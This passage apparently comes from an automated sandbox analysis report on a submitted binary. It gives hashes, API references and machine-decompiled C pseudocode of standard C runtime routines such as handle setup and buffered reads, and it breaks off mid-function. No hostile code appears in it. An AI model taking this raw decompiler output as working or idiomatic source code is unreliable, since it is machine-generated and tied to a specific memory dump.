              0x0040702d
              0x00407032
              0x0040703a
              0x0040703f
              0x00407048
              0x00406eb2
              0x00406eb4
              0x00406ec4
              0x00406ec4

              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: C$a$b$d$i
              • API String ID: 0-2334916691
              • Opcode ID: ef34da2694c3f12963ebffe9c41f50502077d54d39a34053af1e1a013b869dd7
              • Instruction ID: 3fc29d8dc521fb469a95bbb8abda6683934d66c57c2c0db649a3b8fa327b9fe1
              • Opcode Fuzzy Hash: ef34da2694c3f12963ebffe9c41f50502077d54d39a34053af1e1a013b869dd7
              • Instruction Fuzzy Hash: 8C31C2B1A4020CAAD710DFA1DC81FFEB3B9EF85708F00841EF515A7242D77956458B6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040CA02 Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040CA02(void* __eax) {

				return __eax - 1;
			}



              0x0040ca0d

              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77d6fe3352f2066132d2e11dddcf5daa928ef289f5f3e69130d54cc179b5aa1c
              • Instruction ID: 08b14579047c8707026fac63fccc300bf9580103bc096abe646392d642804b1d
              • Opcode Fuzzy Hash: 77d6fe3352f2066132d2e11dddcf5daa928ef289f5f3e69130d54cc179b5aa1c
              • Instruction Fuzzy Hash: 69A0011BF494180148249C8A78410B4E364D197176E5032A7DE0CF35005402C425019D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E138B8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E00E138B8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xe22260);
				E00E12410(__ebx, __edi, __esi);
				E00E1443F(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00E14879();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xe24848 = _t82;
					 *0xe250e4 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xe24848; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0xe24848 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xe26100;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -14829628
											E00E140B2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E00E13B63();
						_t86 = 0;
						L49:
						return E00E12455(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0xe250e4 < _t135) {
						_t138 = E00E14879(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0xe24848[_t149] = _t138;
							 *0xe250e4 =  *0xe250e4 + _t141;
							while(_t138 <  &(0xe24848[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xe250e4;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0xe24848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E00E140B2(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E00E12610(_t155, 0xe23400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























              0x00e138b8
              0x00e138ba
              0x00e138bf
              0x00e138c6
              0x00e138ce
              0x00e138d1
              0x00e138d5
              0x00e138d6
              0x00e138d7
              0x00e138de
              0x00e138e0
              0x00e138e5
              0x00e13902
              0x00e13907
              0x00e1390d
              0x00e13916
              0x00e1391c
              0x00e1391f
              0x00e13922
              0x00e1392b
              0x00e1392e
              0x00e13934
              0x00e13937
              0x00e1393a
              0x00e1393d
              0x00e13940
              0x00e13940
              0x00e1394b
              0x00e13956
              0x00e13a8b
              0x00e13a8d
              0x00e13a8e
              0x00e13a8e
              0x00e13a90
              0x00e13a90
              0x00e13a96
              0x00000000
              0x00000000
              0x00e13aa1
              0x00e13aa7
              0x00e13aad
              0x00e13ac1
              0x00e13ac7
              0x00e13ace
              0x00e13ad3
              0x00e13ad5
              0x00e13ac9
              0x00e13acb
              0x00e13acb
              0x00e13ad9
              0x00e13adf
              0x00e13ae5
              0x00e13b33
              0x00e13b39
              0x00e13b3c
              0x00e13b3e
              0x00e13b45
              0x00e13b4a
              0x00e13b4a
              0x00000000
              0x00e13aeb
              0x00e13aec
              0x00e13af4
              0x00000000
              0x00000000
              0x00e13af9
              0x00e13afb
              0x00e13b03
              0x00e13b10
              0x00e13b1b
              0x00e13b22
              0x00e13b26
              0x00e13b2b
              0x00e13b2e
              0x00000000
              0x00e13b2e
              0x00e13b16
              0x00e13b18
              0x00e13b18
              0x00000000
              0x00e13b18
              0x00e13b09
              0x00000000
              0x00e13b09
              0x00e13ab3
              0x00e13ab9
              0x00e13b4d
              0x00e13b4d
              0x00000000
              0x00e13b4d
              0x00e13aad
              0x00e13b53
              0x00e13b56
              0x00e13b5b
              0x00e13b5d
              0x00e13b62
              0x00e13b62
              0x00e1395c
              0x00e13961
              0x00000000
              0x00000000
              0x00e13967
              0x00e13969
              0x00e1396c
              0x00e1396f
              0x00e13974
              0x00e1397e
              0x00e13980
              0x00e13982
              0x00e13982
              0x00e13987
              0x00e13988
              0x00e1398b
              0x00e1399d
              0x00e1399f
              0x00e139a4
              0x00e13a3e
              0x00e13a45
              0x00e13a4b
              0x00e13a5b
              0x00e13a61
              0x00e13a64
              0x00e13a67
              0x00e13a6b
              0x00e13a71
              0x00e13a74
              0x00e13a77
              0x00e13a7a
              0x00e13a7a
              0x00e13a7f
              0x00e13a80
              0x00e13a83
              0x00000000
              0x00e13a83
              0x00e139aa
              0x00e139b0
              0x00000000
              0x00e139b0
              0x00e139b3
              0x00e139b5
              0x00e139ba
              0x00e139bb
              0x00e139be
              0x00e139c1
              0x00e139c9
              0x00e139ce
              0x00e13a2b
              0x00e13a2b
              0x00e13a2c
              0x00e13a32
              0x00e13a33
              0x00e13a36
              0x00e13a39
              0x00000000
              0x00e139d4
              0x00e139d4
              0x00e139d8
              0x00000000
              0x00000000
              0x00e139dc
              0x00e139ec
              0x00e139f9
              0x00e13a00
              0x00e13a05
              0x00e13a0c
              0x00e13a16
              0x00e13a1a
              0x00e13a1f
              0x00e13a22
              0x00e13a25
              0x00e13a28
              0x00e13a28
              0x00000000
              0x00e13a28
              0x00e139df
              0x00e139e5
              0x00e139ea
              0x00000000
              0x00000000
              0x00000000
              0x00e139ea
              0x00e139ce
              0x00000000
              0x00e139c1
              0x00e138fa
              0x00000000

              APIs
              • __lock.LIBCMT ref: 00E138C6
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __calloc_crt.LIBCMT ref: 00E138D7
                • Part of subcall function 00E14879: __calloc_impl.LIBCMT ref: 00E14888
              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E138F2
              • GetStartupInfoW.KERNEL32(?,00E22260,00000064,00E11664,00E22190,00000014), ref: 00E1394B
              • __calloc_crt.LIBCMT ref: 00E13996
              • GetFileType.KERNEL32(00000001), ref: 00E139DF
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
              • String ID:
              • API String ID: 2772871689-0
              • Opcode ID: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction ID: 2958a021a691dcd6b18f8b9739dc229ccbab23f6871ba39901228fd0587c188c
              • Opcode Fuzzy Hash: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction Fuzzy Hash: 3481D4719052458FCB24CF79C8419EDBBF0AF09324B24A26DE4A6BB3D1D7349983CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E13825 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00E13825(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00E118A0(_t3);
				if(E00E14570() != 0) {
					_t6 = E00E14011(E00E135B6);
					 *0xe2350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00E14879(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00E1389B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00E1406D( *0xe2350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00E13772(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00E1389B();
					return 0;
				}
			}








              0x00e13825
              0x00e13831
              0x00e13840
              0x00e13845
              0x00e1384b
              0x00e1384e
              0x00000000
              0x00e13850
              0x00e1385d
              0x00e13861
              0x00e13863
              0x00e13892
              0x00e13892
              0x00e13897
              0x00e1389a
              0x00e13865
              0x00e13873
              0x00e13875
              0x00000000
              0x00e13877
              0x00e13877
              0x00e13879
              0x00e1387a
              0x00e13881
              0x00e13887
              0x00e1388b
              0x00e1388f
              0x00e13891
              0x00e13891
              0x00e13875
              0x00e13863
              0x00e13833
              0x00e13833
              0x00e13833
              0x00e1383a
              0x00e1383a

              APIs
              • __init_pointers.LIBCMT ref: 00E13825
                • Part of subcall function 00E118A0: EncodePointer.KERNEL32(00000000,?,00E1382A,00E1164A,00E22190,00000014), ref: 00E118A3
                • Part of subcall function 00E118A0: __initp_misc_winsig.LIBCMT ref: 00E118BE
                • Part of subcall function 00E118A0: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E14127
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E1413B
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E1414E
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E14161
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E14174
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E14187
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E1419A
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E141AD
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E141C0
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E141D3
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E141E6
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E141F9
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E1420C
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E1421F
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E14232
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E14245
              • __mtinitlocks.LIBCMT ref: 00E1382A
              • __mtterm.LIBCMT ref: 00E13833
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E1448A
                • Part of subcall function 00E1389B: _free.LIBCMT ref: 00E14491
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(00E23558,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E144B3
              • __calloc_crt.LIBCMT ref: 00E13858
              • __initptd.LIBCMT ref: 00E1387A
              • GetCurrentThreadId.KERNEL32 ref: 00E13881
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 3567560977-0
              • Opcode ID: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction ID: 529ad6d4e10df530e88ead8e88d8a4bcef86403103d4ad6fbb5532aa8f76deca
              • Opcode Fuzzy Hash: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction Fuzzy Hash: 36F0B4B25183211EE23C7B757C076CA2BC19F41B74B21A62AF565F92D2FF51CAC24A90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E191D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E00E191D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00E14C0C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00E1918B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00E11CD3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















              0x00e191de
              0x00e191e3
              0x00e191fd
              0x00000000
              0x00e191fd
              0x00e191e5
              0x00e191ea
              0x00000000
              0x00000000
              0x00e191ef
              0x00e1920c
              0x00e19211
              0x00e19214
              0x00e1921b
              0x00e1923a
              0x00e19241
              0x00e19243
              0x00e19287
              0x00e19293
              0x00e19296
              0x00e1929b
              0x00e1929e
              0x00e192a4
              0x00e192a6
              0x00e192b6
              0x00e192b6
              0x00e192ba
              0x00e192bc
              0x00e192bf
              0x00e192bf
              0x00e192bf
              0x00e192bf
              0x00000000
              0x00e192c5
              0x00e192a8
              0x00e192a8
              0x00e192ad
              0x00e192ad
              0x00e192b0
              0x00000000
              0x00e192b0
              0x00e19245
              0x00e19248
              0x00e1924c
              0x00e19275
              0x00e19275
              0x00e19275
              0x00e19278
              0x00e19278
              0x00000000
              0x00000000
              0x00e1927a
              0x00e1927e
              0x00000000
              0x00000000
              0x00e19280
              0x00e19280
              0x00e19280
              0x00000000
              0x00e19280
              0x00e1924e
              0x00e1924e
              0x00e19251
              0x00000000
              0x00000000
              0x00e19255
              0x00e1925f
              0x00e19265
              0x00e19268
              0x00e1926e
              0x00e19271
              0x00e19273
              0x00000000
              0x00000000
              0x00000000
              0x00e19273
              0x00e1921d
              0x00e19220
              0x00e19222
              0x00e19227
              0x00e19227
              0x00e1922c
              0x00000000
              0x00e1922c
              0x00e191f1
              0x00e191f6
              0x00e191fa
              0x00e191fa
              0x00000000

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E1920C
              • __isleadbyte_l.LIBCMT ref: 00E1923A
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00E19268
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00E1929E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID: Ha
              • API String ID: 3058430110-1493737000
              • Opcode ID: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction ID: 125f5428a789225493ff3e53c0835534989de83673c38399f674e3e39fb3c75e
              • Opcode Fuzzy Hash: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction Fuzzy Hash: F531D03160024ABFDB218E65DC54BFA7BE5FF41324F155528F825A71A2D730D8D0DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E112C2 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 69%
              			E00E112C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00E11540(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00E12762(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00E11540(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00E11CD3())) = 0x22;
												L4:
												E00E11E99();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00E12883(_t119));
											_t88 = E00E12A3A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00E128A7(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
